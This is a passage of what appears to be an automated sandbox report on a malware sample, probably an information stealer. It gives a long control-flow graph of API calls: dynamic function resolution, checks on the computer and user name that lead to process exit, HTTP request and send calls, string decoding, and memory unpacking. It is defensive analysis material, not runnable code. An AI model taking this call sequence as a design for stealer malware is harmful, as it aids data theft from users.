26927->26928 26929 402f33 26928->26929 26930 4045c0 34 API calls 26929->26930 26931 402f4c 26930->26931 26932 4045c0 34 API calls 26931->26932 26933 402f65 26932->26933 26934 4045c0 34 API calls 26933->26934 26935 402f7e 26934->26935 26936 4045c0 34 API calls 26935->26936 26937 402f97 26936->26937 26938 4045c0 34 API calls 26937->26938 26939 402fb0 26938->26939 26940 4045c0 34 API calls 26939->26940 26941 402fc9 26940->26941 26942 4045c0 34 API calls 26941->26942 26943 402fe2 26942->26943 26944 4045c0 34 API calls 26943->26944 26945 402ffb 26944->26945 26946 4045c0 34 API calls 26945->26946 26947 403014 26946->26947 26948 4045c0 34 API calls 26947->26948 26949 40302d 26948->26949 26950 4045c0 34 API calls 26949->26950 26951 403046 26950->26951 26952 4045c0 34 API calls 26951->26952 26953 40305f 26952->26953 26954 4045c0 34 API calls 26953->26954 26955 403078 26954->26955 26956 4045c0 34 API calls 26955->26956 26957 403091 26956->26957 26958 4045c0 34 API calls 26957->26958 26959 4030aa 26958->26959 26960 4045c0 34 API calls 26959->26960 26961 4030c3 26960->26961 26962 4045c0 34 API calls 26961->26962 26963 4030dc 26962->26963 26964 4045c0 34 API calls 26963->26964 26965 4030f5 26964->26965 26966 4045c0 34 API calls 26965->26966 26967 40310e 26966->26967 26968 4045c0 34 API calls 26967->26968 26969 403127 26968->26969 26970 4045c0 34 API calls 26969->26970 26971 403140 26970->26971 26972 4045c0 34 API calls 26971->26972 26973 403159 26972->26973 26974 4045c0 34 API calls 26973->26974 26975 403172 26974->26975 26976 4045c0 34 API calls 26975->26976 26977 40318b 26976->26977 26978 4045c0 34 API calls 26977->26978 26979 4031a4 26978->26979 26980 4045c0 34 API calls 26979->26980 26981 4031bd 26980->26981 26982 4045c0 34 API calls 26981->26982 26983 4031d6 26982->26983 26984 4045c0 34 API calls 26983->26984 26985 4031ef 26984->26985 26986 4045c0 34 API calls 26985->26986 26987 403208 26986->26987 26988 4045c0 34 API calls 26987->26988 26989 403221 26988->26989 26990 4045c0 34 API calls 26989->26990 26991 40323a 26990->26991 26992 4045c0 34 API calls 26991->26992 26993 403253 26992->26993 26994 4045c0 34 API calls 26993->26994 26995 40326c 26994->26995 26996 4045c0 34 API calls 26995->26996 26997 403285 26996->26997 26998 4045c0 34 API calls 26997->26998 26999 40329e 26998->26999 27000 4045c0 34 API calls 26999->27000 27001 4032b7 27000->27001 27002 4045c0 34 API calls 27001->27002 27003 4032d0 27002->27003 27004 4045c0 34 API calls 27003->27004 27005 4032e9 27004->27005 27006 4045c0 34 API calls 27005->27006 27007 403302 27006->27007 27008 4045c0 34 API calls 27007->27008 27009 40331b 27008->27009 27010 4045c0 34 API calls 27009->27010 27011 403334 27010->27011 27012 4045c0 34 API calls 27011->27012 27013 40334d 27012->27013 27014 4045c0 34 API calls 27013->27014 27015 403366 27014->27015 27016 4045c0 34 API calls 27015->27016 27017 40337f 27016->27017 27018 4045c0 34 API calls 27017->27018 27019 403398 27018->27019 27020 4045c0 34 API calls 27019->27020 27021 4033b1 27020->27021 27022 4045c0 34 API calls 27021->27022 27023 4033ca 27022->27023 27024 4045c0 34 API calls 27023->27024 27025 4033e3 27024->27025 27026 4045c0 34 API calls 27025->27026 27027 4033fc 27026->27027 27028 4045c0 34 API calls 27027->27028 27029 403415 27028->27029 27030 4045c0 34 API calls 27029->27030 27031 40342e 27030->27031 27032 4045c0 34 API calls 27031->27032 27033 403447 27032->27033 27034 4045c0 34 API calls 27033->27034 27035 403460 27034->27035 27036 4045c0 34 API calls 27035->27036 27037 403479 27036->27037 27038 4045c0 34 API calls 27037->27038 27039 403492 27038->27039 27040 4045c0 34 API calls 27039->27040 27041 4034ab 27040->27041 27042 4045c0 34 API calls 27041->27042 27043 4034c4 27042->27043 27044 4045c0 34 API calls 27043->27044 27045 4034dd 27044->27045 27046 4045c0 34 API calls 27045->27046 27047 4034f6 27046->27047 27048 4045c0 34 API calls 27047->27048 27049 40350f 27048->27049 27050 4045c0 34 API calls 27049->27050 27051 403528 27050->27051 27052 4045c0 34 API calls 27051->27052 27053 403541 27052->27053 27054 4045c0 34 API calls 27053->27054 27055 40355a 27054->27055 27056 4045c0 34 API calls 27055->27056 27057 403573 27056->27057 27058 4045c0 34 API calls 27057->27058 27059 40358c 27058->27059 27060 4045c0 34 API calls 27059->27060 27061 4035a5 27060->27061 27062 4045c0 34 API calls 27061->27062 27063 4035be 27062->27063 27064 4045c0 34 API calls 27063->27064 27065 4035d7 27064->27065 27066 4045c0 34 API calls 27065->27066 27067 4035f0 27066->27067 27068 4045c0 34 API calls 27067->27068 27069 403609 27068->27069 27070 4045c0 34 API calls 27069->27070 27071 403622 27070->27071 27072 4045c0 34 API calls 27071->27072 27073 40363b 27072->27073 27074 4045c0 34 API calls 27073->27074 27075 403654 27074->27075 27076 4045c0 34 API calls 27075->27076 27077 40366d 27076->27077 27078 4045c0 34 API calls 27077->27078 27079 403686 27078->27079 27080 4045c0 34 API calls 27079->27080 27081 40369f 27080->27081 27082 4045c0 34 API calls 27081->27082 27083 4036b8 27082->27083 27084 4045c0 34 API calls 27083->27084 27085 4036d1 27084->27085 27086 4045c0 34 API calls 27085->27086 27087 4036ea 27086->27087 27088 4045c0 34 API calls 27087->27088 27089 403703 27088->27089 27090 4045c0 34 API calls 27089->27090 27091 40371c 27090->27091 27092 4045c0 34 API calls 27091->27092 27093 403735 27092->27093 27094 4045c0 34 API calls 27093->27094 27095 40374e 27094->27095 27096 4045c0 34 API calls 27095->27096 27097 403767 27096->27097 27098 4045c0 34 API calls 27097->27098 27099 403780 27098->27099 27100 4045c0 34 API calls 27099->27100 27101 403799 27100->27101 27102 4045c0 34 API calls 27101->27102 27103 4037b2 27102->27103 27104 4045c0 34 API calls 27103->27104 27105 4037cb 27104->27105 27106 4045c0 34 API calls 27105->27106 27107 4037e4 27106->27107 27108 4045c0 34 API calls 27107->27108 27109 4037fd 27108->27109 27110 4045c0 34 API calls 27109->27110 27111 403816 27110->27111 27112 4045c0 34 API calls 27111->27112 27113 40382f 27112->27113 27114 4045c0 34 API calls 27113->27114 27115 403848 27114->27115 27116 4045c0 34 API calls 27115->27116 27117 403861 27116->27117 27118 4045c0 34 API calls 27117->27118 27119 40387a 27118->27119 27120 4045c0 34 API calls 27119->27120 27121 403893 27120->27121 27122 4045c0 34 API calls 27121->27122 27123 4038ac 27122->27123 27124 4045c0 34 API calls 27123->27124 27125 4038c5 27124->27125 27126 4045c0 34 API calls 27125->27126 27127 4038de 27126->27127 27128 4045c0 34 API calls 27127->27128 27129 4038f7 27128->27129 27130 4045c0 34 API calls 27129->27130 27131 403910 27130->27131 27132 4045c0 34 API calls 27131->27132 27133 403929 27132->27133 27134 4045c0 34 API calls 27133->27134 27135 403942 27134->27135 27136 4045c0 34 API calls 27135->27136 27137 40395b 27136->27137 27138 4045c0 34 API calls 27137->27138 27139 403974 27138->27139 27140 4045c0 34 API calls 27139->27140 27141 40398d 27140->27141 27142 4045c0 34 API calls 27141->27142 27143 4039a6 27142->27143 27144 4045c0 34 API calls 27143->27144 27145 4039bf 27144->27145 27146 4045c0 34 API calls 27145->27146 27147 4039d8 27146->27147 27148 4045c0 34 API calls 27147->27148 27149 4039f1 27148->27149 27150 4045c0 34 API calls 27149->27150 27151 403a0a 27150->27151 27152 4045c0 34 API calls 27151->27152 27153 403a23 27152->27153 27154 4045c0 34 API calls 27153->27154 27155 403a3c 27154->27155 27156 4045c0 34 API calls 27155->27156 27157 403a55 27156->27157 27158 4045c0 34 API calls 27157->27158 27159 403a6e 27158->27159 27160 4045c0 34 API calls 27159->27160 27161 403a87 27160->27161 27162 4045c0 34 API calls 27161->27162 27163 403aa0 27162->27163 27164 4045c0 34 API calls 27163->27164 27165 403ab9 27164->27165 27166 4045c0 34 API calls 27165->27166 27167 403ad2 27166->27167 27168 4045c0 34 API calls 27167->27168 27169 403aeb 27168->27169 27170 4045c0 34 API calls 27169->27170 27171 403b04 27170->27171 27172 4045c0 34 API calls 27171->27172 27173 403b1d 27172->27173 27174 4045c0 34 API calls 27173->27174 27175 403b36 27174->27175 27176 4045c0 34 API calls 27175->27176 27177 403b4f 27176->27177 27178 4045c0 34 API calls 27177->27178 27179 403b68 27178->27179 27180 4045c0 34 API calls 27179->27180 27181 403b81 27180->27181 27182 4045c0 34 API calls 27181->27182 27183 403b9a 27182->27183 27184 4045c0 34 API calls 27183->27184 27185 403bb3 27184->27185 27186 4045c0 34 API calls 27185->27186 27187 403bcc 27186->27187 27188 4045c0 34 API calls 27187->27188 27189 403be5 27188->27189 27190 4045c0 34 API calls 27189->27190 27191 403bfe 27190->27191 27192 4045c0 34 API calls 27191->27192 27193 403c17 27192->27193 27194 4045c0 34 API calls 27193->27194 27195 403c30 27194->27195 27196 4045c0 34 API calls 27195->27196 27197 403c49 27196->27197 27198 4045c0 34 API calls 27197->27198 27199 403c62 27198->27199 27200 4045c0 34 API calls 27199->27200 27201 403c7b 27200->27201 27202 4045c0 34 API calls 27201->27202 27203 403c94 27202->27203 27204 4045c0 34 API calls 27203->27204 27205 403cad 27204->27205 27206 4045c0 34 API calls 27205->27206 27207 403cc6 27206->27207 27208 4045c0 34 API calls 27207->27208 27209 403cdf 27208->27209 27210 4045c0 34 API calls 27209->27210 27211 403cf8 27210->27211 27212 4045c0 34 API calls 27211->27212 27213 403d11 27212->27213 27214 4045c0 34 API calls 27213->27214 27215 403d2a 27214->27215 27216 4045c0 34 API calls 27215->27216 27217 403d43 27216->27217 27218 4045c0 34 API calls 27217->27218 27219 403d5c 27218->27219 27220 4045c0 34 API calls 27219->27220 27221 403d75 27220->27221 27222 4045c0 34 API calls 27221->27222 27223 403d8e 27222->27223 27224 4045c0 34 API calls 27223->27224 27225 403da7 27224->27225 27226 4045c0 34 API calls 27225->27226 27227 403dc0 27226->27227 27228 4045c0 34 API calls 27227->27228 27229 403dd9 27228->27229 27230 4045c0 34 API calls 27229->27230 27231 403df2 27230->27231 27232 4045c0 34 API calls 27231->27232 27233 403e0b 27232->27233 27234 4045c0 34 API calls 27233->27234 27235 403e24 27234->27235 27236 4045c0 34 API calls 27235->27236 27237 403e3d 27236->27237 27238 4045c0 34 API calls 27237->27238 27239 403e56 27238->27239 27240 4045c0 34 API calls 27239->27240 27241 403e6f 27240->27241 27242 4045c0 34 API calls 27241->27242 27243 403e88 27242->27243 27244 4045c0 34 API calls 27243->27244 27245 403ea1 27244->27245 27246 4045c0 34 API calls 27245->27246 27247 403eba 27246->27247 27248 4045c0 34 API calls 27247->27248 27249 403ed3 27248->27249 27250 4045c0 34 API calls 27249->27250 27251 403eec 27250->27251 27252 4045c0 34 API calls 27251->27252 27253 403f05 27252->27253 27254 4045c0 34 API calls 27253->27254 27255 403f1e 27254->27255 27256 4045c0 34 API calls 27255->27256 27257 403f37 27256->27257 27258 4045c0 34 API calls 27257->27258 27259 403f50 27258->27259 27260 4045c0 34 API calls 27259->27260 27261 403f69 27260->27261 27262 4045c0 34 API calls 27261->27262 27263 403f82 27262->27263 27264 4045c0 34 API calls 27263->27264 27265 403f9b 27264->27265 27266 4045c0 34 API calls 27265->27266 27267 403fb4 27266->27267 27268 4045c0 34 API calls 27267->27268 27269 403fcd 27268->27269 27270 4045c0 34 API calls 27269->27270 27271 403fe6 27270->27271 27272 4045c0 34 API calls 27271->27272 27273 403fff 27272->27273 27274 4045c0 34 API calls 27273->27274 27275 404018 27274->27275 27276 4045c0 34 API calls 27275->27276 27277 404031 27276->27277 27278 4045c0 34 API calls 27277->27278 27279 40404a 27278->27279 27280 4045c0 34 API calls 27279->27280 27281 404063 27280->27281 27282 4045c0 34 API calls 27281->27282 27283 40407c 27282->27283 27284 4045c0 34 API calls 27283->27284 27285 404095 27284->27285 27286 4045c0 34 API calls 27285->27286 27287 4040ae 27286->27287 27288 4045c0 34 API calls 27287->27288 27289 4040c7 27288->27289 27290 4045c0 34 API calls 27289->27290 27291 4040e0 27290->27291 27292 4045c0 34 API calls 27291->27292 27293 4040f9 27292->27293 27294 4045c0 34 API calls 27293->27294 27295 404112 27294->27295 27296 4045c0 34 API calls 27295->27296 27297 40412b 27296->27297 27298 4045c0 34 API calls 27297->27298 27299 404144 27298->27299 27300 4045c0 34 API calls 27299->27300 27301 40415d 27300->27301 27302 4045c0 34 API calls 27301->27302 27303 404176 27302->27303 27304 4045c0 34 API calls 27303->27304 27305 40418f 27304->27305 27306 4045c0 34 API calls 27305->27306 27307 4041a8 27306->27307 27308 4045c0 34 API calls 27307->27308 27309 4041c1 27308->27309 27310 4045c0 34 API calls 27309->27310 27311 4041da 27310->27311 27312 4045c0 34 API calls 27311->27312 27313 4041f3 27312->27313 27314 4045c0 34 API calls 27313->27314 27315 40420c 27314->27315 27316 4045c0 34 API calls 27315->27316 27317 404225 27316->27317 27318 4045c0 34 API calls 27317->27318 27319 40423e 27318->27319 27320 4045c0 34 API calls 27319->27320 27321 404257 27320->27321 27322 4045c0 34 API calls 27321->27322 27323 404270 27322->27323 27324 4045c0 34 API calls 27323->27324 27325 404289 27324->27325 27326 4045c0 34 API calls 27325->27326 27327 4042a2 27326->27327 27328 4045c0 34 API calls 27327->27328 27329 4042bb 27328->27329 27330 4045c0 34 API calls 27329->27330 27331 4042d4 27330->27331 27332 4045c0 34 API calls 27331->27332 27333 4042ed 27332->27333 27334 4045c0 34 API calls 27333->27334 27335 404306 27334->27335 27336 4045c0 34 API calls 27335->27336 27337 40431f 27336->27337 27338 4045c0 34 API calls 27337->27338 27339 404338 27338->27339 27340 4045c0 34 API calls 27339->27340 27341 404351 27340->27341 27342 4045c0 34 API calls 27341->27342 27343 40436a 27342->27343 27344 4045c0 34 API calls 27343->27344 27345 404383 27344->27345 27346 4045c0 34 API calls 27345->27346 27347 40439c 27346->27347 27348 4045c0 34 API calls 27347->27348 27349 4043b5 27348->27349 27350 4045c0 34 API calls 27349->27350 27351 4043ce 27350->27351 27352 4045c0 34 API calls 27351->27352 27353 4043e7 27352->27353 27354 4045c0 34 API calls 27353->27354 27355 404400 27354->27355 27356 4045c0 34 API calls 27355->27356 27357 404419 27356->27357 27358 4045c0 34 API calls 27357->27358 27359 404432 27358->27359 27360 4045c0 34 API calls 27359->27360 27361 40444b 27360->27361 27362 4045c0 34 API calls 27361->27362 27363 404464 27362->27363 27364 4045c0 34 API calls 27363->27364 27365 40447d 27364->27365 27366 4045c0 34 API calls 27365->27366 27367 404496 27366->27367 27368 4045c0 34 API calls 27367->27368 27369 4044af 27368->27369 27370 4045c0 34 API calls 27369->27370 27371 4044c8 27370->27371 27372 4045c0 34 API calls 27371->27372 27373 4044e1 27372->27373 27374 4045c0 34 API calls 27373->27374 27375 4044fa 27374->27375 27376 4045c0 34 API calls 27375->27376 27377 404513 27376->27377 27378 4045c0 34 API calls 27377->27378 27379 40452c 27378->27379 27380 4045c0 34 API calls 27379->27380 27381 404545 27380->27381 27382 4045c0 34 API calls 27381->27382 27383 40455e 27382->27383 27384 4045c0 34 API calls 27383->27384 27385 404577 27384->27385 27386 4045c0 34 API calls 27385->27386 27387 404590 27386->27387 27388 4045c0 34 API calls 27387->27388 27389 4045a9 27388->27389 27390 419c10 27389->27390 27391 419c20 43 API calls 27390->27391 27392 41a036 8 API calls 27390->27392 27391->27392 27393 41a146 27392->27393 27394 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27392->27394 27395 41a153 8 API calls 27393->27395 27396 41a216 27393->27396 27394->27393 27395->27396 27397 41a298 27396->27397 27398 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27396->27398 27399 41a2a5 6 API calls 27397->27399 27400 41a337 27397->27400 27398->27397 27399->27400 27401 41a344 9 API calls 27400->27401 27402 41a41f 27400->27402 27401->27402 27403 41a4a2 27402->27403 27404 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27402->27404 27405 41a4ab GetProcAddress GetProcAddress 27403->27405 27406 41a4dc 27403->27406 27404->27403 27405->27406 27407 41a515 27406->27407 27408 41a4e5 GetProcAddress GetProcAddress 27406->27408 27409 41a612 27407->27409 27410 41a522 10 API calls 27407->27410 27408->27407 27411 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27409->27411 27412 41a67d 27409->27412 27410->27409 27411->27412 27413 41a686 GetProcAddress 27412->27413 27414 41a69e 27412->27414 27413->27414 27415 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27414->27415 27416 415ca3 27414->27416 27415->27416 27417 401590 27416->27417 27692 401670 27417->27692 27420 41a7a0 lstrcpy 27421 4015b5 27420->27421 27422 41a7a0 lstrcpy 27421->27422 27423 4015c7 27422->27423 27424 41a7a0 lstrcpy 27423->27424 27425 4015d9 27424->27425 27426 41a7a0 lstrcpy 27425->27426 27427 401663 27426->27427 27428 415510 27427->27428 27429 415521 27428->27429 27430 41a820 2 API calls 27429->27430 27431 41552e 27430->27431 27432 41a820 2 API calls 27431->27432 27433 41553b 27432->27433 27434 41a820 2 API calls 27433->27434 27435 415548 27434->27435 27436 41a740 lstrcpy 27435->27436 27437 415555 27436->27437 27438 41a740 lstrcpy 27437->27438 27439 415562 27438->27439 27440 41a740 lstrcpy 27439->27440 27441 41556f 27440->27441 27442 41a740 lstrcpy 27441->27442 27482 41557c 27442->27482 27443 4152c0 29 API calls 27443->27482 27444 4151f0 23 API calls 27444->27482 27445 415643 StrCmpCA 27445->27482 27446 4156a0 StrCmpCA 27447 4157dc 27446->27447 27446->27482 27449 41a8a0 lstrcpy 27447->27449 27448 41a7a0 lstrcpy 27448->27482 27450 4157e8 27449->27450 27451 41a820 2 API calls 27450->27451 27454 4157f6 27451->27454 27452 41a740 lstrcpy 27452->27482 27453 41a820 lstrlenA lstrcpy 27453->27482 27456 41a820 2 API calls 27454->27456 27455 415856 StrCmpCA 27457 415991 27455->27457 27455->27482 27460 415805 27456->27460 27459 41a8a0 lstrcpy 27457->27459 27458 41a8a0 lstrcpy 27458->27482 27461 41599d 27459->27461 27462 401670 lstrcpy 27460->27462 27463 41a820 2 API calls 27461->27463 27481 415811 27462->27481 27464 4159ab 27463->27464 27466 41a820 2 API calls 27464->27466 27465 415a0b StrCmpCA 27467 415a16 Sleep 27465->27467 27468 415a28 27465->27468 27469 4159ba 27466->27469 27467->27482 27470 41a8a0 lstrcpy 27468->27470 27471 401670 lstrcpy 27469->27471 27472 415a34 27470->27472 27471->27481 27474 41a820 2 API calls 27472->27474 27473 401590 lstrcpy 27473->27482 27475 415a43 27474->27475 27476 41a820 2 API calls 27475->27476 27477 415a52 27476->27477 27479 401670 lstrcpy 27477->27479 27478 41578a StrCmpCA 27478->27482 27479->27481 27480 41593f StrCmpCA 27480->27482 27481->26536 27482->27443 27482->27444 27482->27445 27482->27446 27482->27448 27482->27452 27482->27453 27482->27455 27482->27458 27482->27465 27482->27473 27482->27478 27482->27480 27484 417553 GetVolumeInformationA 27483->27484 27485 41754c 27483->27485 27489 417591 27484->27489 27485->27484 27486 4175fc GetProcessHeap HeapAlloc 27487 417619 27486->27487 27488 417628 wsprintfA 27486->27488 27490 41a740 lstrcpy 27487->27490 27491 41a740 lstrcpy 27488->27491 27489->27486 27492 415da7 27490->27492 27491->27492 27492->26557 27494 41a7a0 lstrcpy 27493->27494 27495 404899 27494->27495 27701 4047b0 27495->27701 27497 4048a5 27498 41a740 lstrcpy 27497->27498 27499 4048d7 27498->27499 27500 41a740 lstrcpy 27499->27500 27501 4048e4 27500->27501 27502 41a740 lstrcpy 27501->27502 27503 4048f1 27502->27503 27504 41a740 lstrcpy 27503->27504 27505 4048fe 27504->27505 27506 41a740 lstrcpy 27505->27506 27507 40490b InternetOpenA StrCmpCA 27506->27507 27508 404944 27507->27508 27509 404955 27508->27509 27510 404ecb InternetCloseHandle 27508->27510 27714 418b60 GetSystemTime lstrcpy lstrcpy 27509->27714 27512 404ee8 27510->27512 27709 409ac0 CryptStringToBinaryA 27512->27709 27513 404963 27715 41a920 lstrcpy lstrcpy lstrcatA 27513->27715 27516 404976 27518 41a8a0 lstrcpy 27516->27518 27523 40497f 27518->27523 27519 41a820 2 API calls 27520 404f05 27519->27520 27522 41a9b0 4 API calls 27520->27522 27521 404f27 ctype 27525 41a7a0 lstrcpy 27521->27525 27524 404f1b 27522->27524 27527 41a9b0 4 API calls 27523->27527 27526 41a8a0 lstrcpy 27524->27526 27538 404f57 27525->27538 27526->27521 27528 4049a9 27527->27528 27529 41a8a0 lstrcpy 27528->27529 27530 4049b2 27529->27530 27531 41a9b0 4 API calls 27530->27531 27532 4049d1 27531->27532 27533 41a8a0 lstrcpy 27532->27533 27534 4049da 27533->27534 27716 41a920 lstrcpy lstrcpy lstrcatA 27534->27716 27536 4049f8 27537 41a8a0 lstrcpy 27536->27537 27539 404a01 27537->27539 27538->26560 27540 41a9b0 4 API calls 27539->27540 27541 404a20 27540->27541 27542 41a8a0 lstrcpy 27541->27542 27543 404a29 27542->27543 27544 41a9b0 4 API calls 27543->27544 27545 404a48 27544->27545 27546 41a8a0 lstrcpy 27545->27546 27547 404a51 27546->27547 27548 41a9b0 4 API calls 27547->27548 27549 404a7d 27548->27549 27717 41a920 lstrcpy lstrcpy lstrcatA 27549->27717 27551 404a84 27552 41a8a0 lstrcpy 27551->27552 27553 404a8d 27552->27553 27554 404aa3 InternetConnectA 27553->27554 27554->27510 27555 404ad3 HttpOpenRequestA 27554->27555 27557 404b28 27555->27557 27558 404ebe InternetCloseHandle 27555->27558 27559 41a9b0 4 API calls 27557->27559 27558->27510 27560 404b3c 27559->27560 27561 41a8a0 lstrcpy 27560->27561 27562 404b45 27561->27562 27718 41a920 lstrcpy lstrcpy lstrcatA 27562->27718 27564 404b63 27565 41a8a0 lstrcpy 27564->27565 27566 404b6c 27565->27566 27567 41a9b0 4 API calls 27566->27567 27568 404b8b 27567->27568 27569 41a8a0 lstrcpy 27568->27569 27570 404b94 27569->27570 27571 41a9b0 4 API calls 27570->27571 27572 404bb5 27571->27572 27573 41a8a0 lstrcpy 27572->27573 27574 404bbe 27573->27574 27575 41a9b0 4 API calls 27574->27575 27576 404bde 27575->27576 27577 41a8a0 lstrcpy 27576->27577 27578 404be7 27577->27578 27579 41a9b0 4 API calls 27578->27579 27580 404c06 27579->27580 27581 41a8a0 lstrcpy 27580->27581 27582 404c0f 27581->27582 27719 41a920 lstrcpy lstrcpy lstrcatA 27582->27719 27584 404c2d 27585 41a8a0 lstrcpy 27584->27585 27586 404c36 27585->27586 27587 41a9b0 4 API calls 27586->27587 27588 404c55 27587->27588 27589 41a8a0 lstrcpy 27588->27589 27590 404c5e 27589->27590 27591 41a9b0 4 API calls 27590->27591 27592 404c7d 27591->27592 27593 41a8a0 lstrcpy 27592->27593 27594 404c86 27593->27594 27720 41a920 lstrcpy lstrcpy lstrcatA 27594->27720 27596 404ca4 27597 41a8a0 lstrcpy 27596->27597 27598 404cad 27597->27598 27599 41a9b0 4 API calls 27598->27599 27600 404ccc 27599->27600 27601 41a8a0 lstrcpy 27600->27601 27602 404cd5 27601->27602 27603 41a9b0 4 API calls 27602->27603 27604 404cf6 27603->27604 27605 41a8a0 lstrcpy 27604->27605 27606 404cff 27605->27606 27607 41a9b0 4 API calls 27606->27607 27608 404d1f 27607->27608 27609 41a8a0 lstrcpy 27608->27609 27610 404d28 27609->27610 27611 41a9b0 4 API calls 27610->27611 27612 404d47 27611->27612 27613 41a8a0 lstrcpy 27612->27613 27614 404d50 27613->27614 27721 41a920 lstrcpy lstrcpy lstrcatA 27614->27721 27616 404d6e 27617 41a8a0 lstrcpy 27616->27617 27618 404d77 27617->27618 27619 41a740 lstrcpy 27618->27619 27620 404d92 27619->27620 27722 41a920 lstrcpy lstrcpy lstrcatA 27620->27722 27622 404db3 27723 41a920 lstrcpy lstrcpy lstrcatA 27622->27723 27624 404dba 27625 41a8a0 lstrcpy 27624->27625 27626 404dc6 27625->27626 27627 404de7 lstrlenA 27626->27627 27628 404dfa 27627->27628 27629 404e03 lstrlenA 27628->27629 27724 41aad0 27629->27724 27631 404e13 HttpSendRequestA 27632 404e32 InternetReadFile 27631->27632 27633 404e67 InternetCloseHandle 27632->27633 27638 404e5e 27632->27638 27635 41a800 27633->27635 27635->27558 27636 41a9b0 4 API calls 27636->27638 27637 41a8a0 lstrcpy 27637->27638 27638->27632 27638->27633 27638->27636 27638->27637 27729 41aad0 27639->27729 27641 4117c4 StrCmpCA 27642 4117d7 27641->27642 27643 4117cf ExitProcess 27641->27643 27644 4117e7 strtok_s 27642->27644 27647 4117f4 27644->27647 27645 4119c2 27645->26562 27646 41199e strtok_s 27646->27647 27647->27645 27647->27646 27648 4118ad StrCmpCA 27647->27648 27649 4118cf StrCmpCA 27647->27649 27650 4118f1 StrCmpCA 27647->27650 27651 411951 StrCmpCA 27647->27651 27652 411970 StrCmpCA 27647->27652 27653 411913 StrCmpCA 27647->27653 27654 411932 StrCmpCA 27647->27654 27655 41185d StrCmpCA 27647->27655 27656 41187f StrCmpCA 27647->27656 27657 41a820 lstrlenA lstrcpy 27647->27657 27658 41a820 2 API calls 27647->27658 27648->27647 27649->27647 27650->27647 27651->27647 27652->27647 27653->27647 27654->27647 27655->27647 27656->27647 27657->27647 27658->27646 27659->26568 27660->26570 27661->26576 27662->26578 27663->26584 27664->26586 27665->26590 27666->26594 27667->26598 27668->26604 27669->26606 27670->26610 27671->26624 27672->26628 27673->26627 27674->26623 27675->26627 27676->26640 27677->26666 27678->26643 27679->26651 27680->26655 27681->26644 27682->26645 27683->26653 27684->26656 27685->26680 27686->26684 27687->26685 27688->26681 27689->26685 27690->26694 27693 41a7a0 lstrcpy 27692->27693 27694 401683 27693->27694 27695 41a7a0 lstrcpy 27694->27695 27696 401695 27695->27696 27697 41a7a0 lstrcpy 27696->27697 27698 4016a7 27697->27698 27699 41a7a0 lstrcpy 27698->27699 27700 4015a3 27699->27700 27700->27420 27725 401030 27701->27725 27705 404838 lstrlenA 27728 41aad0 27705->27728 27707 404848 InternetCrackUrlA 27708 404867 27707->27708 27708->27497 27710 409af9 LocalAlloc 27709->27710 27711 404eee 27709->27711 27710->27711 27712 409b14 CryptStringToBinaryA 27710->27712 27711->27519 27711->27521 27712->27711 27713 409b39 LocalFree 27712->27713 27713->27711 27714->27513 27715->27516 27716->27536 27717->27551 27718->27564 27719->27584 27720->27596 27721->27616 27722->27622 27723->27624 27724->27631 27726 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27725->27726 27727 41aad0 27726->27727 27727->27705 27728->27707 27729->27641 27831 b4d106 41 API calls __amsg_exit 27868 416ab1 880 API calls 27832 4069f3 7 API calls 27745 b30005 27750 b3092b GetPEB 27745->27750 27747 b30030 27751 b3003c 27747->27751 27750->27747 27752 b30049 27751->27752 27766 b30e0f SetErrorMode SetErrorMode 27752->27766 27757 b30265 27758 b302ce VirtualProtect 27757->27758 27760 b3030b 27758->27760 27759 b30439 VirtualFree 27764 b305f4 LoadLibraryA 27759->27764 27765 b304be 27759->27765 27760->27759 27761 b304e3 LoadLibraryA 27761->27765 27763 b308c7 27764->27763 27765->27761 27765->27764 27767 b30223 27766->27767 27768 b30d90 27767->27768 27769 b30dad 27768->27769 27770 b30238 VirtualAlloc 27769->27770 27771 b30dbb GetPEB 27769->27771 27770->27757 27771->27770 27870 b46a0a ExitProcess 27871 41cafe 219 API calls 5 library calls 27872 b4cd97 170 API calls 2 library calls 27873 b4be78 162 API calls 2 library calls 26301 401190 26308 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26301->26308 26303 40119e 26304 4011cc 26303->26304 26310 417850 GetProcessHeap HeapAlloc GetUserNameA 26303->26310 26306 4011b7 26306->26304 26307 4011c4 ExitProcess 26306->26307 26309 417939 26308->26309 26309->26303 26311 4178c3 26310->26311 26311->26306 27836 b3fd67 152 API calls 27806 b43823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 27874 41ce9f 69 API calls __amsg_exit 27807 b46c57 692 API calls 27808 b43823 6 API calls 27809 4088a4 RaiseException task __CxxThrowException@8 27810 4180a5 GetProcessHeap HeapFree 27811 b4140b strtok_s 27772 84a46c VirtualAlloc CreateToolhelp32Snapshot Module32First 27812 b4102b StrCmpCA strtok_s lstrlen lstrcpy 27840 b46d18 646 API calls 27841 41b9b0 RtlUnwind 27876 b46a40 6 API calls 27877 b43b7d 91 API calls 2 library calls

                                                  Control-flow Graph

                                                  APIs
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                  • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
